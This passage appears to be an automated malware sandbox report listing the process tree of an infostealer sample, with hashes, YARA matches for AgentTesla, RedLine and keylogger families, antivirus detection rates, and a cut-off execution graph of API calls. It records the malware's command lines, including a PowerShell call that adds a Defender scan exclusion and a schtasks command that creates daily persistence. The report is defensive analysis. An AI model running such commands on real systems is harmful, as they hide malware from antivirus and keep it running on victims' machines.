                                                                                                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\server02.exe, Author: unknown
                                                                                                                                                      • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: C:\Users\user\AppData\Local\Temp\server02.exe, Author: Florian Roth
                                                                                                                                                      Antivirus matches:
                                                                                                                                                      • Detection: 100%, Avira
                                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                                      • Detection: 83%, ReversingLabs
                                                                                                                                                      Reputation:low
                                                                                                                                                      Has exited:false

                                                                                                                                                      Target ID:13
                                                                                                                                                      Start time:12:26:49
                                                                                                                                                      Start date:28/11/2024
                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\neworigin.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:"C:\Users\user~1\AppData\Local\Temp\neworigin.exe"
                                                                                                                                                      Imagebase:0x2f0000
                                                                                                                                                      File size:250'368 bytes
                                                                                                                                                      MD5 hash:D6A4CF0966D24C1EA836BA9A899751E5
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Yara matches:
                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000002.3714279992.0000000002661000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000D.00000002.3714279992.0000000002661000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000000.1294374756.00000000002F2000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000D.00000000.1294374756.00000000002F2000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, Author: Joe Security
                                                                                                                                                      • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, Author: ditekSHen
                                                                                                                                                      Antivirus matches:
                                                                                                                                                      • Detection: 100%, Avira
                                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                                      • Detection: 82%, ReversingLabs
                                                                                                                                                      Reputation:moderate
                                                                                                                                                      Has exited:false

                                                                                                                                                      Target ID:15
                                                                                                                                                      Start time:12:26:52
                                                                                                                                                      Start date:28/11/2024
                                                                                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                                                                                                                                                      Imagebase:0xac0000
                                                                                                                                                      File size:433'152 bytes
                                                                                                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:16
                                                                                                                                                      Start time:12:26:52
                                                                                                                                                      Start date:28/11/2024
                                                                                                                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:"schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 12:31 /du 23:59 /sc daily /ri 1 /f
                                                                                                                                                      Imagebase:0x190000
                                                                                                                                                      File size:187'904 bytes
                                                                                                                                                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:17
                                                                                                                                                      Start time:12:26:52
                                                                                                                                                      Start date:28/11/2024
                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                      Imagebase:0x7ff75da10000
                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:18
                                                                                                                                                      Start time:12:26:52
                                                                                                                                                      Start date:28/11/2024
                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                      Imagebase:0x7ff75da10000
                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:19
                                                                                                                                                      Start time:12:26:52
                                                                                                                                                      Start date:28/11/2024
                                                                                                                                                      Path:C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
                                                                                                                                                      Imagebase:0xfe0000
                                                                                                                                                      File size:231'936 bytes
                                                                                                                                                      MD5 hash:50D015016F20DA0905FD5B37D7834823
                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Antivirus matches:
                                                                                                                                                      • Detection: 100%, Avira
                                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                                      • Detection: 92%, ReversingLabs
                                                                                                                                                      Reputation:moderate
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:20
                                                                                                                                                      Start time:12:26:52
                                                                                                                                                      Start date:28/11/2024
                                                                                                                                                      Path:C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:"C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
                                                                                                                                                      Imagebase:0xde0000
                                                                                                                                                      File size:231'936 bytes
                                                                                                                                                      MD5 hash:50D015016F20DA0905FD5B37D7834823
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Has exited:false

                                                                                                                                                      Target ID:21
                                                                                                                                                      Start time:12:26:52
                                                                                                                                                      Start date:28/11/2024
                                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpA3B8.tmp.cmd""
                                                                                                                                                      Imagebase:0x410000
                                                                                                                                                      File size:236'544 bytes
                                                                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:22
                                                                                                                                                      Start time:12:26:52
                                                                                                                                                      Start date:28/11/2024
                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                      Imagebase:0x7ff75da10000
                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:23
                                                                                                                                                      Start time:12:26:53
                                                                                                                                                      Start date:28/11/2024
                                                                                                                                                      Path:C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:timeout 6
                                                                                                                                                      Imagebase:0x970000
                                                                                                                                                      File size:25'088 bytes
                                                                                                                                                      MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:24
                                                                                                                                                      Start time:12:26:56
                                                                                                                                                      Start date:28/11/2024
                                                                                                                                                      Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                      Imagebase:0x7ff7fb730000
                                                                                                                                                      File size:496'640 bytes
                                                                                                                                                      MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:25
                                                                                                                                                      Start time:12:27:00
                                                                                                                                                      Start date:28/11/2024
                                                                                                                                                      Path:C:\Windows\System32\wscript.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\spadixes.vbs"
                                                                                                                                                      Imagebase:0x7ff741390000
                                                                                                                                                      File size:170'496 bytes
                                                                                                                                                      MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:26
                                                                                                                                                      Start time:12:27:00
                                                                                                                                                      Start date:28/11/2024
                                                                                                                                                      Path:C:\Users\user\AppData\Local\bothsided\spadixes.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\bothsided\spadixes.exe"
                                                                                                                                                      Imagebase:0x8c0000
                                                                                                                                                      File size:2'267'136 bytes
                                                                                                                                                      MD5 hash:FA7DCECB3C5AC81610C93C6B91CDA38A
                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Yara matches:
                                                                                                                                                      • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000001A.00000002.1427486186.0000000003F20000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:27
                                                                                                                                                      Start time:12:27:01
                                                                                                                                                      Start date:28/11/2024
                                                                                                                                                      Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\bothsided\spadixes.exe"
                                                                                                                                                      Imagebase:0xcc0000
                                                                                                                                                      File size:46'504 bytes
                                                                                                                                                      MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:29
                                                                                                                                                      Start time:12:27:02
                                                                                                                                                      Start date:28/11/2024
                                                                                                                                                      Path:C:\Users\user\AppData\Local\bothsided\spadixes.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\bothsided\spadixes.exe"
                                                                                                                                                      Imagebase:0x8c0000
                                                                                                                                                      File size:2'267'136 bytes
                                                                                                                                                      MD5 hash:FA7DCECB3C5AC81610C93C6B91CDA38A
                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Yara matches:
                                                                                                                                                      • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000001D.00000002.1441006965.0000000003680000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:30
                                                                                                                                                      Start time:12:27:04
                                                                                                                                                      Start date:28/11/2024
                                                                                                                                                      Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\bothsided\spadixes.exe"
                                                                                                                                                      Imagebase:0xcc0000
                                                                                                                                                      File size:46'504 bytes
                                                                                                                                                      MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:31
                                                                                                                                                      Start time:12:27:04
                                                                                                                                                      Start date:28/11/2024
                                                                                                                                                      Path:C:\Users\user\AppData\Local\bothsided\spadixes.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\bothsided\spadixes.exe"
                                                                                                                                                      Imagebase:0x8c0000
                                                                                                                                                      File size:2'267'136 bytes
                                                                                                                                                      MD5 hash:FA7DCECB3C5AC81610C93C6B91CDA38A
                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Yara matches:
                                                                                                                                                      • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000001F.00000002.1452830281.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:32
                                                                                                                                                      Start time:12:27:05
                                                                                                                                                      Start date:28/11/2024
                                                                                                                                                      Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\bothsided\spadixes.exe"
                                                                                                                                                      Imagebase:0xcc0000
                                                                                                                                                      File size:46'504 bytes
                                                                                                                                                      MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:33
                                                                                                                                                      Start time:12:27:05
                                                                                                                                                      Start date:28/11/2024
                                                                                                                                                      Path:C:\Users\user\AppData\Local\bothsided\spadixes.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\bothsided\spadixes.exe"
                                                                                                                                                      Imagebase:0x8c0000
                                                                                                                                                      File size:2'267'136 bytes
                                                                                                                                                      MD5 hash:FA7DCECB3C5AC81610C93C6B91CDA38A
                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Yara matches:
                                                                                                                                                      • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000021.00000002.1489110172.00000000035A0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:34
                                                                                                                                                      Start time:12:27:06
                                                                                                                                                      Start date:28/11/2024
                                                                                                                                                      Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\bothsided\spadixes.exe"
                                                                                                                                                      Imagebase:0xcc0000
                                                                                                                                                      File size:46'504 bytes
                                                                                                                                                      MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Yara matches:
                                                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000022.00000003.1483462887.0000000008600000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000022.00000002.1577778530.0000000005E00000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000022.00000002.1596364234.0000000008B00000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000022.00000002.1574359559.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                      • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000022.00000002.1580669736.000000000734E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000022.00000002.1580669736.000000000734E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000022.00000002.1580669736.000000000734E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000022.00000002.1580669736.000000000734E000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000022.00000002.1580669736.0000000007205000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000022.00000002.1596182253.0000000008640000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:35
                                                                                                                                                      Start time:14:19:15
                                                                                                                                                      Start date:28/11/2024
                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\TrojanAI.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:"C:\Users\user~1\AppData\Local\Temp\TrojanAI.exe"
                                                                                                                                                      Imagebase:0x30000
                                                                                                                                                      File size:231'936 bytes
                                                                                                                                                      MD5 hash:50D015016F20DA0905FD5B37D7834823
                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:37
                                                                                                                                                      Start time:14:19:24
                                                                                                                                                      Start date:28/11/2024
                                                                                                                                                      Path:C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:"C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
                                                                                                                                                      Imagebase:0xc70000
                                                                                                                                                      File size:231'936 bytes
                                                                                                                                                      MD5 hash:50D015016F20DA0905FD5B37D7834823
                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Has exited:true

                                                                                                                                                      Reset < >

                                                                                                                                                        Execution Graph

                                                                                                                                                        Execution Coverage:4.6%
                                                                                                                                                        Dynamic/Decrypted Code Coverage:1.2%
                                                                                                                                                        Signature Coverage:9.1%
                                                                                                                                                        Total number of Nodes:1564
                                                                                                                                                        Total number of Limit Nodes:57
                                                                                                                                                        execution_graph 53953 cbb64 53954 cbb77 53953->53954 53955 cbb71 53953->53955 53956 cbb88 53954->53956 53958 a1c9d _free 47 API calls 53954->53958 53961 a1c9d 53955->53961 53959 cbb9a 53956->53959 53960 a1c9d _free 47 API calls 53956->53960 53958->53956 53960->53959 53962 a1ccf __dosmaperr 53961->53962 53963 a1ca6 RtlFreeHeap 53961->53963 53962->53954 53963->53962 53964 a1cbb 53963->53964 53967 a7c0e 47 API calls __getptd_noexit 53964->53967 53966 a1cc1 GetLastError 53966->53962 53967->53966 53968 91820 53969 91858 53968->53969 53973 918cb 53968->53973 53970 fb6cf 53969->53970 53971 91862 53969->53971 53975 fb6ee 53970->53975 53976 fb6dc 53970->53976 53972 9186c 53971->53972 53987 fb73e 53971->53987 53981 fb89e 53972->53981 53985 9187a 53972->53985 54033 91891 53972->54033 53974 fb44d 53973->53974 54013 918d7 53973->54013 54050 ccc5c 86 API calls 3 library calls 53974->54050 54056 dbdbd 122 API calls Mailbox 53975->54056 54055 df45e 88 API calls Mailbox 53976->54055 53978 fb77f 53988 fb79e 53978->53988 53989 fb78a 53978->53989 54063 86eed 48 API calls 53981->54063 53982 fb45e 53983 fb701 53986 fb705 53983->53986 53983->54033 53985->54033 54064 b97ed InterlockedDecrement 53985->54064 54057 ccc5c 86 API calls 3 library calls 53986->54057 53987->53978 53999 fb763 53987->53999 54034 dccdc 48 API calls 53988->54034 54059 df45e 88 API calls Mailbox 53989->54059 53993 fb654 54054 86eed 48 API calls 53993->54054 53995 fb9af 54003 fb9e5 53995->54003 54087 df0ac 90 API calls 53995->54087 53996 fb7a9 54011 fb826 53996->54011 54020 fb7cb 53996->54020 53998 91a0b 53998->53982 53998->53993 53998->54033 54052 b97ed InterlockedDecrement 53998->54052 54058 ccc5c 86 API calls 3 library calls 53999->54058 54000 9199a 54006 fb524 54000->54006 54017 919a4 54000->54017 54089 8dcae 50 API calls Mailbox 54003->54089 54051 9c1af 48 API calls 54006->54051 54007 fb98d 54066 8936c 54007->54066 54060 ca69d 48 API calls 54011->54060 54012 fb9c3 54015 8936c 81 API calls 54012->54015 54013->53998 54013->54000 54014 a1621 48 API calls 54013->54014 54019 91b28 54013->54019 54031 918c0 Mailbox 54013->54031 54014->54013 54023 fb9cb __NMSG_WRITE 54015->54023 54017->53998 54017->54019 54053 ccc5c 86 API calls 3 library calls 54019->54053 54035 c9b72 48 API calls 54020->54035 54021 fb838 54061 8bc74 48 API calls 54021->54061 54022 fb995 __NMSG_WRITE 54022->53995 54086 8dcae 50 API calls Mailbox 54022->54086 54023->54003 54088 8dcae 50 API calls Mailbox 54023->54088 54028 fb841 54062 c9b72 48 API calls 54028->54062 54029 fb7f0 54036 945e0 54029->54036 54033->53995 54033->54031 54065 def61 82 API calls __ftell_nolock 54033->54065 54034->53996 54035->54029 54037 9479f 54036->54037 54038 94637 54036->54038 54144 8ce19 54037->54144 54041 f6e05 54038->54041 54143 94300 87 API calls ___crtGetEnvironmentStringsW 54038->54143 54042 94739 Mailbox 54041->54042 54150 ccc5c 86 API calls 3 library calls 54041->54150 54042->54033 54044 94659 54044->54041 54044->54042 54045 946e4 54044->54045 54090 84252 54045->54090 54096 c6524 54045->54096 54099 d6ff0 54045->54099 54106 cfa0c 54045->54106 54050->53982 54051->53998 54052->53998 54053->54031 54054->54033 54055->54033 54056->53983 54057->54031 54058->54031 54059->54033 54060->54021 54061->54028 54062->54033 54063->54033 54064->54033 54065->54007 54067 89384 54066->54067 54084 89380 54066->54084 54068 893b0 __itow _wcscpy 54067->54068 54069 f4cbd __i64tow 54067->54069 54070 f4bbf 54067->54070 54071 89398 54067->54071 54076 9f4ea 48 API calls 54068->54076 54072 f4bc8 54070->54072 54073 f4ca5 54070->54073 55028 a172b 80 API calls 3 library calls 54071->55028 54072->54068 54077 f4be7 54072->54077 55029 a172b 80 API calls 3 library calls 54073->55029 54078 893ba 54076->54078 54079 9f4ea 48 API calls 54077->54079 54080 8ce19 48 API calls 54078->54080 54078->54084 54082 f4c04 54079->54082 54080->54084 54081 9f4ea 48 API calls 54083 f4c2a 54081->54083 54082->54081 54083->54084 54085 8ce19 48 API calls 54083->54085 54084->54022 54085->54084 54086->53995 54087->54012 54088->54003 54089->54031 54091 8425c 54090->54091 54092 84263 54090->54092 54151 a35e4 54091->54151 54094 84272 54092->54094 54095 84283 FreeLibrary 54092->54095 54094->54042 54095->54094 54454 c6ca9 GetFileAttributesW 54096->54454 54100 8936c 81 API calls 54099->54100 54101 d702a 54100->54101 54458 8b470 54101->54458 54103 d703a 54105 d7063 54103->54105 54486 8cdb9 48 API calls 54103->54486 54105->54042 54107 cfa1c __ftell_nolock 54106->54107 54108 cfa44 54107->54108 54627 8d286 48 API calls 54107->54627 54110 8936c 81 API calls 54108->54110 54111 cfa5e 54110->54111 54112 cfb68 54111->54112 54113 cfa80 54111->54113 54121 cfb92 54111->54121 54552 841a9 54112->54552 54115 8936c 81 API calls 54113->54115 54120 cfa8c _wcscpy _wcschr 54115->54120 54117 cfb8e 54118 8936c 81 API calls 54117->54118 54117->54121 54125 cfbc7 _wcscat __wsplitpath _wcscpy 54118->54125 54119 841a9 136 API calls 54119->54117 54124 cfab0 _wcscat _wcscpy 54120->54124 54130 cfade _wcscat 54120->54130 54121->54042 54122 8936c 81 API calls 54123 cfafc _wcscpy 54122->54123 54628 c72cb GetFileAttributesW 54123->54628 54126 8936c 81 API calls 54124->54126 54133 8936c 81 API calls 54125->54133 54126->54130 54128 cfb1c __NMSG_WRITE 54128->54121 54129 8936c 81 API calls 54128->54129 54131 cfb48 54129->54131 54130->54122 54629 c60dd 77 API calls 4 library calls 54131->54629 54135 cfc82 54133->54135 54134 cfb5c 54134->54121 54136 c6524 3 API calls 54135->54136 54137 cfcb1 54136->54137 54138 8936c 81 API calls 54137->54138 54141 cfce2 54137->54141 54139 cfccb 54138->54139 54576 cbfa4 54139->54576 54142 84252 84 API calls 54141->54142 54142->54121 54143->54044 54145 8ce28 __NMSG_WRITE 54144->54145 54146 9ee75 48 API calls 54145->54146 54147 8ce50 ___crtGetEnvironmentStringsW 54146->54147 54148 9f4ea 48 API calls 54147->54148 54149 8ce66 54148->54149 54149->54045 54150->54042 54152 a35f0 __setmbcp 54151->54152 54153 a361c 54152->54153 54154 a3604 54152->54154 54161 a3614 __setmbcp 54153->54161 54164 a4e1c 54153->54164 54186 a7c0e 47 API calls __getptd_noexit 54154->54186 54157 a3609 54187 a6e10 8 API calls __wtof_l 54157->54187 54161->54092 54165 a4e4e EnterCriticalSection 54164->54165 54166 a4e2c 54164->54166 54168 a362e 54165->54168 54166->54165 54167 a4e34 54166->54167 54189 a7cf4 54167->54189 54170 a3578 54168->54170 54171 a3587 54170->54171 54173 a359b 54170->54173 54267 a7c0e 47 API calls __getptd_noexit 54171->54267 54172 a3597 54188 a3653 LeaveCriticalSection LeaveCriticalSection _fseek 54172->54188 54173->54172 54227 a2c84 54173->54227 54175 a358c 54268 a6e10 8 API calls __wtof_l 54175->54268 54182 a35b5 54244 ae9d2 54182->54244 54184 a35bb 54184->54172 54185 a1c9d _free 47 API calls 54184->54185 54185->54172 54186->54157 54187->54161 54188->54161 54190 a7d18 EnterCriticalSection 54189->54190 54191 a7d05 54189->54191 54190->54168 54196 a7d7c 54191->54196 54193 a7d0b 54193->54190 54220 a115b 47 API calls 3 library calls 54193->54220 54197 a7d88 __setmbcp 54196->54197 54198 a7da9 54197->54198 54199 a7d91 54197->54199 54205 a7e11 __setmbcp 54198->54205 54212 a7da7 54198->54212 54221 a81c2 47 API calls 2 library calls 54199->54221 54202 a7d96 54222 a821f 47 API calls 6 library calls 54202->54222 54203 a7dbd 54206 a7dd3 54203->54206 54207 a7dc4 54203->54207 54205->54193 54210 a7cf4 __lock 46 API calls 54206->54210 54225 a7c0e 47 API calls __getptd_noexit 54207->54225 54208 a7d9d 54223 a1145 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 54208->54223 54214 a7dda 54210->54214 54212->54198 54224 a69d0 47 API calls __crtGetStringTypeA_stat 54212->54224 54213 a7dc9 54213->54205 54215 a7de9 InitializeCriticalSectionAndSpinCount 54214->54215 54216 a7dfe 54214->54216 54217 a7e04 54215->54217 54218 a1c9d _free 46 API calls 54216->54218 54226 a7e1a LeaveCriticalSection _doexit 54217->54226 54218->54217 54221->54202 54222->54208 54224->54203 54225->54213 54226->54205 54228 a2c97 54227->54228 54232 a2cbb 54227->54232 54229 a2933 __flswbuf 47 API calls 54228->54229 54228->54232 54230 a2cb4 54229->54230 54269 aaf61 54230->54269 54233 aeb36 54232->54233 54234 a35af 54233->54234 54235 aeb43 54233->54235 54237 a2933 54234->54237 54235->54234 54236 a1c9d _free 47 API calls 54235->54236 54236->54234 54238 a293d 54237->54238 54239 a2952 54237->54239 54410 a7c0e 47 API calls __getptd_noexit 54238->54410 54239->54182 54241 a2942 54411 a6e10 8 API calls __wtof_l 54241->54411 54243 a294d 54243->54182 54245 